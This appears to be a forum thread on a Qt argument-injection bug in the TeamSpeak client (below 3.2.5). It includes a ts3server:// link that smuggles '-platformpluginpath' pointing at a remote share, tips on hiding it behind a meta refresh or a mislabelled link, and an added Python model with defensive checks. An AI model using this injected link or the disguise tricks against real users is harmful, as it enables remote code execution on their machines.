Remote Code Execution vulnerability in Qt (Client < 3.2.5)

fyfywka (TeamSpeak Developer, Contributor):

Bluscream (Retired Staff, Contributor):

If it's that, you would need to trick the user into clicking something like [URL=ts3server://voice.teamspeak.com -platformpluginpath \\192.168.131.152\share]ts3server://voice.teamspeak.com[/URL]
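The mechanism Bluscream describes, as an added example that is not code from this thread, from TeamSpeak or from Qt: a model of how a ts3server:// link carrying a space and `-platformpluginpath` ends up as separate argv entries, the argv scan Qt performs for that flag, and the two checks that stop it (a quoted `%1` in the protocol handler, and refusing URIs that contain whitespace or quotes, checked raw and after percent-decoding). The handler templates, the `C:\TeamSpeak` path and the 192.168.131.152 share are assumed illustrative values, and the argument splitting is a simplified model of Windows parsing (whitespace separates arguments, double quotes group them), not an exact CommandLineToArgvW.

```python
"""
Added example (not code from the thread, TeamSpeak or Qt): how a ts3server://
link smuggles Qt's -platformpluginpath flag into the client's argv, and the
checks that stop it. Handler templates and the share address are illustrative;
the argv split is a simplified model of Windows argument parsing.
"""
import re
from typing import List, Optional
from urllib.parse import unquote


def split_command_line(cmdline: str) -> List[str]:
    """Simplified Windows-style split: whitespace separates args, "..." groups them."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def expand_handler(template: str, uri: str) -> List[str]:
    """Substitute the clicked URI into a registry-style handler command and split it.

    Windows expands %1 textually before the program starts, so whether the
    template writes %1 or "%1" decides how many argv entries the URI becomes.
    """
    return split_command_line(template.replace("%1", uri))


def qt_platform_plugin_path(argv: List[str]) -> Optional[str]:
    """Mirror of Qt's startup scan: the argv entry after -platformpluginpath
    (or --platformpluginpath) is the directory Qt loads platform plugins from."""
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("--"):
            arg = arg[1:]
        if arg == "-platformpluginpath":
            return argv[i + 1] if i + 1 < len(argv) else None
        i += 1
    return None


def uri_rejection_reason(uri: str, scheme: str = "ts3server") -> Optional[str]:
    """Checks a receiving client (or a link filter) should run before acting on a URI.

    Applied to the raw string and to its percent-decoded form, because a client
    that decodes the URI before re-launching itself would reintroduce the spaces.
    Returns None when the URI is acceptable.
    """
    if not uri.lower().startswith(scheme + "://"):
        return "unexpected scheme"
    for form, text in (("raw", uri), ("percent-decoded", unquote(uri))):
        if re.search(r"\s", text):
            return f"{form} URI contains whitespace (would split into extra arguments)"
        if '"' in text:
            return f"{form} URI contains a double quote (could close a quoted %1)"
    return None


def handler_quotes_uri(template: str) -> bool:
    """True if the handler command wraps %1 in quotes, so the URI stays one argument."""
    return '"%1"' in template


def demo() -> dict:
    """Run the link from the thread through an unquoted and a quoted handler."""
    link = r"ts3server://voice.teamspeak.com -platformpluginpath \\192.168.131.152\share"
    unquoted = r"C:\TeamSpeak\ts3client_win64.exe %1"     # illustrative template
    quoted = r'"C:\TeamSpeak\ts3client_win64.exe" "%1"'    # illustrative template
    return {
        "unquoted_plugin_path": qt_platform_plugin_path(expand_handler(unquoted, link)),
        "quoted_plugin_path": qt_platform_plugin_path(expand_handler(quoted, link)),
        "rejection": uri_rejection_reason(link),
        "clean_link_ok": uri_rejection_reason("ts3server://voice.teamspeak.com?port=9987") is None,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the unquoted template the UNC share lands in argv right after the flag, so Qt would search it for platform plugins; with `"%1"` the whole link is a single argv entry that never equals `-platformpluginpath`. Quoting alone is not enough if the application later decodes or re-splits the URI, which is why the client-side rejection check is kept separate.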

DrWarpMan (Member):
Was it any guy from r4p3 that found this?

Kieran (Tag me, Contributor):
Very interesting. So basically you tell Qt 'Ye, to load your DLLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscate the exploit in TS by putting the custom ts3server URI handler as a meta refresh on a page like this [url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?
 

InVaDeR359 (Active Member):
[quote="Kieran"]Very interesting. So basically you tell Qt 'Ye, to load your DLLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscate the exploit in TS by putting the custom ts3server URI handler as a meta refresh on a page like this [url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?[/quote]
I think you mean [url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url]
 

Kieran (Tag me, Contributor):
[quote="InVaDeR359"]I think you mean [url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url][/quote]
Also a possibility, but that may spark suspicion when someone copies the link instead of clicking right away, since the displayed URL is different from the one that is linked.
 

Asphyxia (Owner, Administrator):
[quote="DrWarpMan"]Was it any guy from r4p3 that found this?[/quote]
No. Any software development framework offers a lot of extensibility to developers so they can work with and around the operating system. With frameworks being so powerful, they have the potential to be abused and ultimately misused for malicious purposes by hackers. This issue was found regarding Qt, not specifically TeamSpeak, but thankfully they (the TeamSpeak developers) are staying on top of security patches, probably because we have made them rightfully paranoid, which is a GOOD thing. We have done our job; now we are safer.

With that said, there may be more security issues with many frameworks like Qt (TeamSpeak uses this framework for their software).

One example can be found here: https://securiteam.com/unixfocus/5NP0O2KDPI/ or http://scary.beasts.org/security/CESA-2004-004.txt

I believe something similar to this was used when we developed the avatar crasher: https://r4p3.net/threads/teamspeak-3-avatar-crash-client-3-0-0-3-0-17.335/



If we found a way to utilize this vulnerability, we would have released a PoC (Proof of Concept) demonstrating how one could use this for educational purposes.

People like @Harrasan think everything in life comes free and no one has to work for anything. He is actually really close to being banned, because you can find him complaining about everything and thinking proficient security researchers need $0 to run expensive servers and study for $8,000 reverse engineering classes to become a malware analyst and incident responder for the FBI/NSA/etc.

Update: A PoC is over here https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739



Looks very simple... a security mistake that is small with big issues possible.

tagKnife (Well-Known Member):
Origin got hit by the same exploit.

AMD also uses Qt, but it looks like they don't have a URI registered, at least not on my system.
